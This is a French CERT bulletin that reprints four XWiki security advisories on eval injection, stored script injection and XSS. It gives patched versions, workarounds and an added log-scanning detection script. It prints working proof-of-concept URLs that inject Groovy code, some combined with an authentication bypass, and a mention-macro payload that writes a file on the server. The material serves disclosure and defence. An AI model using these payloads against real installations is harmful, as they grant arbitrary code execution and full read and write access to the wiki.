=====================================================================
CERT-Renater Note d'Information No. 2022/VULN320
_____________________________________________________________________

DATE : 12/09/2022

HARDWARE PLATFORM(S): /

OPERATING SYSTEM(S): Systems running
    org.xwiki.platform:xwiki-application-tag (Maven) versions >= 1.7,
    org.xwiki.platform:xwiki-platform-tag-ui (Maven) versions prior to 13.10.6, 14.4,
    xwiki-platform-wiki-ui-mainwiki (Maven) versions prior to 13.10.6, 14.4,
    org.xwiki.platform:xwiki-platform-mentions-ui (Maven) versions prior to 14.4, 13.10.6,
    org.xwiki.platform:xwiki-platform-attachment-ui (Maven) versions prior to 14.4-rc-1.
=====================================================================

https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-2g5c-228j-p52x
https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-xr6m-2p4m-jvqf
https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-c5v8-2q4r-5w9v
https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-9r9j-57rf-f6vj
_____________________________________________________________________

Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection') in xwiki-platform-tag-ui
Severity: Critical
Published by surli: GHSA-2g5c-228j-p52x

Package                                             Affected versions    Patched versions
org.xwiki.platform:xwiki-application-tag (Maven)    >= 1.7               None
org.xwiki.platform:xwiki-platform-tag-ui (Maven)    < 13.10.6, < 14.4    13.10.6, 14.4

Description

Impact

The tags document Main.Tags in XWiki didn't sanitize user inputs properly, allowing users with view rights on the document (the default in a public wiki, or for authenticated users on private wikis) to execute arbitrary Groovy, Python and Velocity code with programming rights. This allows bypassing all rights checks and thus both modification and disclosure of all content stored in the XWiki installation. It could also be used to impact the availability of the wiki.
Some versions of XWiki XML-escaped the tag (e.g., version 3.1), but this isn't a serious limitation as string literals can be delimited by / in Groovy and < and > aren't necessary, e.g., to elevate privileges of the current user. On XWiki versions before 13.10.4 and 14.2, this can be combined with the authentication bypass using the login action, meaning that no rights are required to perform the attack.

The following URL demonstrates the attack:
/xwiki/bin/login/Main/Tags?xpage=view&do=viewTag&tag=%7B%7Basync+async%3D%22true%22+cached%3D%22false%22+context%3D%22doc.reference%22%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22hello+from+groovy%21%22%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D
where is the URL of the XWiki installation.

On current versions (e.g., 14.3), the issue can be exploited by requesting the URL
/xwiki/bin/view/Main/Tags?do=viewTag&tag=%7B%7Basync%20async%3D%22true%22%20cached%3D%22false%22%20context%3D%22doc.reference%22%7D%7D%7B%7Bgroovy%7D%7Dprintln(%22hello%20from%20groovy!%22)%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D
where is the URL of the server.

On XWiki 2.0 (which contains version 1.7 of the tag application), the URL
/xwiki/bin/view/Main/Tags?do=viewTag&tag={{/html}}{{groovy}}println(%2Fhello from groovy!%2F){{%2Fgroovy}}
demonstrates the exploit, while on XWiki 3.1 the following URL demonstrates the exploit:
/xwiki/bin/view/Main/Tags?do=viewTag&tag={{/html}}{{footnote}}{{groovy}}println(%2Fhello%20from%20groovy!%2F){{%2Fgroovy}}{{/footnote}}

Patches

This has been patched in the supported versions 13.10.6 and 14.4.

Workarounds

The patch that fixes the issue can be manually applied to the document Main.Tags, or the updated version of that document can be imported from version 14.4 of xwiki-platform-tag-ui using the import feature in the administration UI on XWiki 10.9 and later (earlier versions might not be compatible with the current version of the document).
References

commit 6048680
https://jira.xwiki.org/browse/XWIKI-19747

For more information

If you have any questions or comments about this advisory:
    Open an issue in Jira XWiki.org
    Email us at Security Mailing List

Severity: Critical, 9.9 / 10

CVSS base metrics
    Attack vector:       Network
    Attack complexity:   Low
    Privileges required: Low
    User interaction:    None
    Scope:               Changed
    Confidentiality:     High
    Integrity:           High
    Availability:        High
    CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

CVE ID: CVE-2022-36100
Weaknesses: CWE-95
_____________________________________________________________________

Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection') in xwiki-platform-wiki-ui-mainwiki
Severity: Critical
Published by surli: GHSA-xr6m-2p4m-jvqf

Package                                    Affected versions     Patched versions
xwiki-platform-wiki-ui-mainwiki (Maven)    >= 5.3-milestone-2    13.10.6, 14.4

Description

Impact

It's possible to inject arbitrary wiki syntax, including Groovy, Python and Velocity script macros, via the request (URL parameter) using the XWikiServerClassSheet if the user has view access to this sheet and to another page that has been saved with programming rights, a standard condition on a public read-only XWiki installation or on a private XWiki installation where the user has an account. This allows arbitrary Groovy/Python/Velocity code execution, which bypasses all rights checks and thus allows both modification and disclosure of all content stored in the XWiki installation. It could also be used to impact the availability of the wiki.
On current versions (e.g., 14.3), this can be triggered by opening the URL
/xwiki/bin/view/Main/?sheet=XWiki.XWikiServerClassSheet&form_token=&action=delete&domain=foo%22%2F%7D%7D%7B%7Basync%20async%3D%22true%22%20cached%3D%22false%22%20context%3D%22doc.reference%22%7D%7D%7B%7Bgroovy%7D%7Dprintln(%22hello%20from%20groovy!%22)%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D

On version 5.3 Milestone 2 (the oldest impacted version), the issue can be reproduced using
/xwiki/bin/view/Main/?sheet=WikiManager.XWikiServerClassSheet&form_token=&action=delete&domain=foo%22%2F%7D%7D%7B%7B%2Ferror%7D%7D%7B%7B%2Fhtml%7D%7D%7B%7Bfootnote%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22hello+from+groovy%21%22%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Ffootnote%7D%7D

In both cases is the URL of the XWiki installation and is the token used for CSRF protection for the current user, which is available in every HTML response (search for form-token or form_token in the HTML source). If the string hello from groovy is displayed without println(" before it, the attack has been successful.

Patches

This has been patched in the supported versions 13.10.6 and 14.4.
Workarounds

It is possible to edit the affected document XWiki.XWikiServerClassSheet or WikiManager.XWikiServerClassSheet and manually perform the changes from the patch fixing the issue, i.e., replacing
    {{error}}{{translation key="platform.wiki.sheet.erroraliasalreadynotexists" parameters="$request.domain"/}}{{/error}}
by
    {{error}}{{translation key="platform.wiki.sheet.erroraliasalreadynotexists" parameters="~"${services.rendering.escape($escapetool.java($request.domain), 'xwiki/2.1')}~""/}}{{/error}}
and replacing
    {{error}}{{translation key="platform.wiki.sheet.erroraliasdoesnotexists" parameters="$request.domain"/}}{{/error}}
by
    {{error}}{{translation key="platform.wiki.sheet.erroraliasdoesnotexists" parameters="~"${services.rendering.escape($escapetool.java($request.domain), 'xwiki/2.1')}~""/}}{{/error}}

Note that below version 7.1 milestone 1, the escaping function used here isn't available, so a different fix would need to be developed. On XWiki versions 12.0 and later, it is also possible to import the document XWiki.XWikiServerClassSheet from the xwiki-platform-wiki-ui-mainwiki package version 14.4 using the import feature of the administration application, as there have been no other changes to this document since XWiki 12.0.
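A detection check a defender can run over web-server access logs for the two eval-injection issues above: script macros smuggled into the tag= parameter of Main.Tags and into the domain= parameter when sheet= names XWikiServerClassSheet. This is an added example, not code from XWiki or from the advisories; the endpoint and parameter names follow the URLs quoted above, the macro list and the log format are assumptions, and the log lines are constructed.

```python
"""Detection-only scan of access logs for the script-macro injection patterns
described in the Main.Tags (tag=) and XWikiServerClassSheet (domain=) advisories."""
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Script and wrapper macros the advisories show being smuggled into parameters (assumed list).
MACRO_RE = re.compile(r"\{\{\s*/?\s*(groovy|python|velocity|async|html|footnote|error)\b", re.I)
# Request target (path + query) from a combined-format access log line.
REQ_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')


def decode(value: str) -> str:
    """Percent-decode until stable so a double-encoded payload is not missed."""
    prev = None
    while prev != value:
        prev, value = value, unquote_plus(value)
    return value


def classify(request_target: str):
    """Return (rule, parameter, decoded value) for a suspicious request, else None."""
    parts = urlsplit(request_target)
    params = {k: decode(v[0]) for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    if parts.path.endswith("/Main/Tags") and MACRO_RE.search(params.get("tag", "")):
        return ("CVE-2022-36100 Main.Tags", "tag", params["tag"])
    if params.get("sheet", "").endswith("XWikiServerClassSheet") and MACRO_RE.search(params.get("domain", "")):
        return ("CVE-2022-36099 XWikiServerClassSheet", "domain", params["domain"])
    for name, value in params.items():  # broad fallback; noisy on legitimate save/edit actions
        if MACRO_RE.search(value):
            return ("wiki macro in request parameter", name, value)
    return None


def scan(lines):
    """Return one finding tuple per log line whose request target is suspicious."""
    findings = []
    for line in lines:
        match = REQ_RE.search(line)
        hit = classify(match.group(1)) if match else None
        if hit:
            findings.append(hit)
    return findings


# Constructed sample lines (not real traffic); the second and third mimic the advisory URLs.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Sep/2022:10:00:01 +0200] "GET /xwiki/bin/view/Main/Tags?do=viewTag&tag=security HTTP/1.1" 200 5120',
    '10.0.0.7 - - [12/Sep/2022:10:00:02 +0200] "GET /xwiki/bin/view/Main/Tags?do=viewTag&tag=%7B%7Bgroovy%7D%7Dprintln(%22hi%22)%7B%7B%2Fgroovy%7D%7D HTTP/1.1" 200 6100',
    '10.0.0.7 - - [12/Sep/2022:10:00:03 +0200] "GET /xwiki/bin/view/Main/?sheet=XWiki.XWikiServerClassSheet&action=delete&domain=foo%22%2F%7D%7D%7B%7Bgroovy%7D%7D HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for rule, name, value in scan(SAMPLE_LOG):
        print(f"{rule}: parameter {name!r} = {value!r}")
```

A 200 response to such a request is not proof of success on a patched instance; confirm by checking the installed versions of the affected packages against the patched versions listed above.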
References

commit fc77f9f
https://jira.xwiki.org/browse/XWIKI-19746

For more information

If you have any questions or comments about this advisory:
    Open an issue in Jira XWiki.org
    Email us at Security Mailing List

Severity: Critical, 9.9 / 10

CVSS base metrics
    Attack vector:       Network
    Attack complexity:   Low
    Privileges required: Low
    User interaction:    None
    Scope:               Changed
    Confidentiality:     High
    Integrity:           High
    Availability:        High
    CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

CVE ID: CVE-2022-36099
Weaknesses: CWE-95
_____________________________________________________________________

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in org.xwiki.platform:xwiki-platform-mentions-ui
Severity: Critical
Published by surli: GHSA-c5v8-2q4r-5w9v

Package                                                Affected versions    Patched versions
org.xwiki.platform:xwiki-platform-mentions-ui (Maven)  >= 12.5-rc-1         14.4, 13.10.6

Description

Impact

It's possible to store JavaScript or Groovy scripts in a mention macro anchor or reference field. The stored code is executed by anyone visiting the page with the mention. For example, the mention below will create a file at /tmp/exploit.txt:
    {{mention reference="XWiki.Translation" anchor="{{/html~}~}{{async async=~"true~" cached=~"false~" context=~"doc.reference~"~}~}{{groovy~}~}new File(~"/tmp/exploit.txt~").withWriter { out -> out.println(~"owned!~"); }{{/groovy~}~}{{/async~}~}"/}}

Patches

This issue has been patched in XWiki 14.4 and 13.10.6.

Workarounds

It's possible to fix the vulnerability by updating XWiki.Mentions.MentionsMacro and editing the Macro code field of the XWiki.WikiMacroClass XObject:
    $content
must be replaced by
    $escapetool.xml($content)

See the patches:
    14.4: 4f290d8
    13.10.6: 4032dc8#diff-4fe22885f772e47d3561a05348f73921669ec12d4413b220383b73c7ae484bc4R608-R610

References

https://jira.xwiki.org/browse/XWIKI-19752

For more information

If you have any questions or comments about this advisory:
    Open an issue in Jira XWiki.org
    Email us at Security Mailing List

Severity: Critical, 9.9 / 10

CVSS base metrics
    Attack vector:       Network
    Attack complexity:   Low
    Privileges required: Low
    User interaction:    None
    Scope:               Changed
    Confidentiality:     High
    Integrity:           High
    Availability:        High
    CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

CVE ID: CVE-2022-36098
Weaknesses: CWE-95
_____________________________________________________________________

XSS in the move attachment form
Severity: High
Published by surli: GHSA-9r9j-57rf-f6vj (published yesterday)

Package                                                  Affected versions    Patched versions
org.xwiki.platform:xwiki-platform-attachment-ui (Maven)  >= 14.0-rc-1         14.4-rc-1

Description

Impact

It's possible to store JavaScript in an attachment name, which will be executed by anyone trying to move the corresponding attachment. For example, an attachment with name >.jpg will execute the alert.

Patches

This issue has been patched in XWiki 14.4RC1.

Workarounds

It is possible to fix the vulnerability by copying moveStep1.vm to webapp/xwiki/templates/moveStep1.vm and replacing
    #set($titleToDisplay = $services.localization.render('attachment.move.title', [$attachment.name, $escapetool.xml($doc.plainTitle), $doc.getURL()]))
by
    #set($titleToDisplay = $services.localization.render('attachment.move.title', [ $escapetool.xml($attachment.name), $escapetool.xml($doc.plainTitle), $escapetool.xml($doc.getURL()) ]))

See the corresponding patch.
References

https://jira.xwiki.org/browse/XWIKI-19667

For more information

If you have any questions or comments about this advisory:
    Open an issue in Jira XWiki.org
    Email us at Security Mailing List

Severity: High, 8.9 / 10

CVSS base metrics
    Attack vector:       Network
    Attack complexity:   Low
    Privileges required: Low
    User interaction:    Required
    Scope:               Changed
    Confidentiality:     High
    Integrity:           High
    Availability:        Low
    CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:L

CVE ID: CVE-2022-36097
Weaknesses: CWE-80

=========================================================
+ CERT-RENATER           | tel : 01-53-94-20-44         +
+ 23/25 Rue Daviel       | fax : 01-53-94-20-41         +
+ 75013 Paris            | email: cert@support.renater.fr +
=========================================================